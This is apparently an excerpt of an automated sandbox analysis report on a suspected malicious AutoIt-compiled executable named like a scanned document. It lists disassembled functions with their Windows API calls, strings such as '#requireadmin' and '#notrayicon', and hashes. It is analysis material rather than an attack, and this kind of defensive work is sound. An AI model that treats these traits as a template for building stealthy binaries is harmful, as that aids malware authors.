Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 23587f9a4e4894d6de02ba3d6bedcc0ecf51d5b3519f9710f14db884b495cb35
Instruction ID: 9de2c604cbf10b1e829b87333a6d9cce19363ed06d07c2fd60f20eef70d95470
Opcode Fuzzy Hash: 23587f9a4e4894d6de02ba3d6bedcc0ecf51d5b3519f9710f14db884b495cb35
Instruction Fuzzy Hash: 6F319C31201605AFEF208E38DC45BEA7BA9FB4A334F205725F975E25D0D7B4AC909B50

Function 0089304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0089335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00893077,?,?), ref: 00893378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0089307A
_wcslen.LIBCMT ref: 0089309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00893106

Strings

255.255.255.255, xrefs: 00893095, 0089309A

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 2e663dc0273502947d0f5ba944558a1fc918940c82b9f8e60cc3aa5ec7b2147c
Instruction ID: 9b310032cadc4a259e90056e185f885259427069ac9b769fd231bc22395bafd4
Opcode Fuzzy Hash: 2e663dc0273502947d0f5ba944558a1fc918940c82b9f8e60cc3aa5ec7b2147c
Instruction Fuzzy Hash: 0731D3392002059FCF20EF68C885EAA77E0FF55318F288059E915CB7A2DB36EE45C761

Function 008A4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 008A4705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 008A4713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 008A471A

Strings

msctls_updown32, xrefs: 008A4684

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: f939df726f4f2a83c16492a673b03379a5ca935d99fa401599974cd0e54b05de
Instruction ID: 6abec5156b7dd2e113903eae3d29bbd116e8be216a22360c2e1769fee626a160
Opcode Fuzzy Hash: f939df726f4f2a83c16492a673b03379a5ca935d99fa401599974cd0e54b05de
Instruction Fuzzy Hash: 9D214CB5600248AFEB10DF68DCC1DAB77ADFB9B3A4B040059FA01DB261DB70EC51CA61

Function 008795AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0087961D

Strings

#requireadmin, xrefs: 008795D9
#OnAutoItStartRegister, xrefs: 008795F3
#notrayicon, xrefs: 008795B7

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: a9541b1dea02b1dfdd809da575b3cbad8d518ee307ac1a3b18673d74f2b65b2d
Instruction ID: ef3a8045a5999bea28da92258f3af03958b3123b2619e4bf22d0b915f4231249
Opcode Fuzzy Hash: a9541b1dea02b1dfdd809da575b3cbad8d518ee307ac1a3b18673d74f2b65b2d
Instruction Fuzzy Hash: 6E213B7210422166D331EA299C02FB773ACFFA1314F108029F9CDD7149EB55ED81C2D6

Function 008A37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 008A3840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 008A3850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 008A3876

Strings

Listbox, xrefs: 008A380F

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 3a179f5a666ae81e60d6bf1b1bfec0dfac1bb2078cf0dc7405648f22c2c91b8f
Instruction ID: 8932e2f165a332976d5831fb03690821ec6cb72adc245aea9cbdb05cd1f80ad5
Opcode Fuzzy Hash: 3a179f5a666ae81e60d6bf1b1bfec0dfac1bb2078cf0dc7405648f22c2c91b8f
Instruction Fuzzy Hash: 85218E72610218BBFF218F54CC85FAB376EFF8A754F108125F9149B590DA75DC528BA0

Function 008849F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00884A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00884A5C
SetErrorMode.KERNEL32(00000000,?,?,008ACC08), ref: 00884AD0

Strings

%lu, xrefs: 00884A6F

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: f0cea8f5935274c7b6033fc254f5b78f0206a688aebe0b201e4e1fe37a70e2b8
Instruction ID: b567fcc41e8af2189c777bde43fa98fb1c81de4000a877078b85ed6c298d0272
Opcode Fuzzy Hash: f0cea8f5935274c7b6033fc254f5b78f0206a688aebe0b201e4e1fe37a70e2b8
Instruction Fuzzy Hash: 7E315E75A00119AFDB10DF58C885EAA7BF8FF09308F1480A9E909DB352DB75EE45CB61

Function 008A41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 008A424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 008A4264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 008A4271

Strings

msctls_trackbar32, xrefs: 008A4226

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 4369454715c02ce989f01f607bca4648c5939d4fe0720bf19a84cc8d5f567a86
Instruction ID: 5bab714a6eb6b6248163b3f24236fdf01d4d44edfcf5d9d067d13c14169ac188
Opcode Fuzzy Hash: 4369454715c02ce989f01f607bca4648c5939d4fe0720bf19a84cc8d5f567a86
Instruction Fuzzy Hash: 9911E331240248BEFF205E28CC46FAB3BACFF96B54F110124FA55E6090D6B1DC519B60

Function 00872F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00816B57: _wcslen.LIBCMT ref: 00816B6A

Part of subcall function 00872DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00872DC5
Part of subcall function 00872DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00872DD6
Part of subcall function 00872DA7: GetCurrentThreadId.KERNEL32 ref: 00872DDD
Part of subcall function 00872DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00872DE4

GetFocus.USER32 ref: 00872F78

Part of subcall function 00872DEE: GetParent.USER32(00000000), ref: 00872DF9

GetClassNameW.USER32(?,?,00000100), ref: 00872FC3
EnumChildWindows.USER32(?,0087303B), ref: 00872FEB

Strings

%s%d, xrefs: 00872FFF

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: eb582b516551dbeca6f8521bd78ba54a3d5ba5c841bb9a41fe5efb9a9ef49258
Instruction ID: 000e411ac42f4a24e38765281c8ac581b02d30d97930df346d50818b3bae0177
Opcode Fuzzy Hash: eb582b516551dbeca6f8521bd78ba54a3d5ba5c841bb9a41fe5efb9a9ef49258
Instruction Fuzzy Hash: CB11E4716002096BDF10BF788C85EED3B6AFF94314F048079F90DDB256EE3099459B62

Function 008A5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008A58C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008A58EE
DrawMenuBar.USER32(?), ref: 008A58FD

Strings

0, xrefs: 008A588F

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 509d7eebca2197c6caff68c0280b49c7ea98e9621f16985ae881c85c32fc9c42
Instruction ID: d79603d81fc7f8a8b1f0234cba6b397bdc0a4eb05638a5f8cabb4ee0721517a0
Opcode Fuzzy Hash: 509d7eebca2197c6caff68c0280b49c7ea98e9621f16985ae881c85c32fc9c42
Instruction Fuzzy Hash: 34015B31500218EEEB219F15EC44BAFBBB4FF46360F1480A9F949DA552DB308AC4DF21

Function 0087007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d93edae1f780acef7607408cb36c24467d2573c3111f0dd7ebd19af59b8ae7db
Instruction ID: a674420898bac3a123476b380722b27479a30620ea25abcfb93f0f04c0dd7bc9
Opcode Fuzzy Hash: d93edae1f780acef7607408cb36c24467d2573c3111f0dd7ebd19af59b8ae7db
Instruction Fuzzy Hash: C5C15B75A0020AEFDB14CFA8C894AAEB7B5FF48704F208598E509EB255D731EE41CF90

Function 0089342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00893459
CoUninitialize.OLE32 ref: 00893463
VariantInit.OLEAUT32(?), ref: 0089346E
VariantClear.OLEAUT32(?), ref: 0089371B

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 1d6b1c309e9c7964eb572e10b682dc4c6b1ef6ddf9756a7d3617bd4b25ac18e2
Instruction ID: fe9880188b10c011bc80e0b225d3e5a36c7e57b30e0c7b10b181cf1f035e9d8b
Opcode Fuzzy Hash: 1d6b1c309e9c7964eb572e10b682dc4c6b1ef6ddf9756a7d3617bd4b25ac18e2
Instruction Fuzzy Hash: F7A13D756042109FCB11EF68C485A5AB7E9FF88714F09885DF98ADB362DB30ED41CB52

Function 00870436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,008AFC08,?), ref: 008705F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,008AFC08,?), ref: 00870608
CLSIDFromProgID.OLE32(?,?,00000000,008ACC40,000000FF,?,00000000,00000800,00000000,?,008AFC08,?), ref: 0087062D
_memcmp.LIBVCRUNTIME ref: 0087064E

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: c575a17e17059da0076003726722c25f8d805f08fbfe5cca867c9db04f635f3d
Instruction ID: 1b8caa126e3dd3b9c995dc00dbe1d6d367a7298840d45c9140e5ea7279e5b0c6
Opcode Fuzzy Hash: c575a17e17059da0076003726722c25f8d805f08fbfe5cca867c9db04f635f3d
Instruction Fuzzy Hash: A281E971A00209EFCB04DF94C984DEEB7B9FF89315B208558E516EB254DB71AE46CF60

Function 00851391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008514C0

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 672f744f3447d2cd063c7dd696c9500d30e45b35e6467c4bd001fe2e097314c2
Instruction ID: d01f969fcb6dfbc7fc5695d221e4f46e2030c880d7de4799ae7a9fb73a9ab19b
Opcode Fuzzy Hash: 672f744f3447d2cd063c7dd696c9500d30e45b35e6467c4bd001fe2e097314c2
Instruction Fuzzy Hash: D9414C35A00104ABDF216BBDDC8DBBF3AA6FF81371F144225FC19D6292E6B4484553A7

Function 008A6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00D0F700,?), ref: 008A62E2
ScreenToClient.USER32(?,?), ref: 008A6315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 008A6382

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 96d7adc506ee0a029fa13765b21b23f2c1fce436aeaec421446f3c0aa19347b9
Instruction ID: 492b881e8a57786133ff15c9183488376116d6438774d2d0e4fd85fbf605df35
Opcode Fuzzy Hash: 96d7adc506ee0a029fa13765b21b23f2c1fce436aeaec421446f3c0aa19347b9
Instruction Fuzzy Hash: 16514A70A00209EFEF10DF68D880AAE7BB5FF56360F148169F815DB694E770AD91CB50

Function 00891AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00891AFD
WSAGetLastError.WSOCK32 ref: 00891B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00891B8A
WSAGetLastError.WSOCK32 ref: 00891B94

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: b922aff71c0cb142b93f436522e42be5006d97ac11e9f5a52e4ccb99d5eae879
Instruction ID: 93791ad3dae93623745be24a84403d97412971f50af63c1c06956d1cfcaabcf7
Opcode Fuzzy Hash: b922aff71c0cb142b93f436522e42be5006d97ac11e9f5a52e4ccb99d5eae879
Instruction Fuzzy Hash: 0B41AF346402006FEB20AF28C88AF6577A5FF44718F588448F5169F3D2D672ED828B91

Function 0084B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1225d5204238bf20b7509eae421cc2f0ac13e3faf93d1b3bda4a5500361c30ba
Instruction ID: 692cff2035023ea6240168e260a26bf56bd9a502c00166662f6a8358fc0527e0
Opcode Fuzzy Hash: 1225d5204238bf20b7509eae421cc2f0ac13e3faf93d1b3bda4a5500361c30ba
Instruction Fuzzy Hash: 78410471A00308AFD7249F7CCC46BAABBA9FB88720F10852AF555DB682D771D9018781

Function 008856D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00885783
GetLastError.KERNEL32(?,00000000), ref: 008857A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 008857CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 008857FA

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 6f3d906f4b584d8995183e460b498ecbaa6e824d2861b2088463d9daf7e36aab
Instruction ID: f6ba009f8e429f25e2b05d8a004b5c5063004948f7593f931015dc2c89299e08
Opcode Fuzzy Hash: 6f3d906f4b584d8995183e460b498ecbaa6e824d2861b2088463d9daf7e36aab
Instruction Fuzzy Hash: 1A41FB35600610DFCB11EF19C545A9ABBF6FF49720B198498E84A9B362CB34FD41CB92

Function 0084D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00836D71,00000000,00000000,008382D9,?,008382D9,?,00000001,00836D71,8BE85006,00000001,008382D9,008382D9), ref: 0084D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0084D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0084D9AB
__freea.LIBCMT ref: 0084D9B4

Part of subcall function 00843820: RtlAllocateHeap.NTDLL(00000000,?,008E1444,?,0082FDF5,?,?,0081A976,00000010,008E1440,008113FC,?,008113C6,?,00811129), ref: 00843852

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: c7aeac4a2b1e0bc14ea050de4d3da000f2a20009ab3b24445dd402bd7d1842a5
Instruction ID: de722104b89663ece983ae1241342df0e2e60f491f5cc2d6dbbbc14b5732fce7
Opcode Fuzzy Hash: c7aeac4a2b1e0bc14ea050de4d3da000f2a20009ab3b24445dd402bd7d1842a5
Instruction Fuzzy Hash: 0531BC72A0020AABDF249F69DC45EAE7FA5FB41710F054268FC04DB2A0EB35DD51CBA1

Function 008A52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 008A5352
GetWindowLongW.USER32(?,000000F0), ref: 008A5375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 008A5382
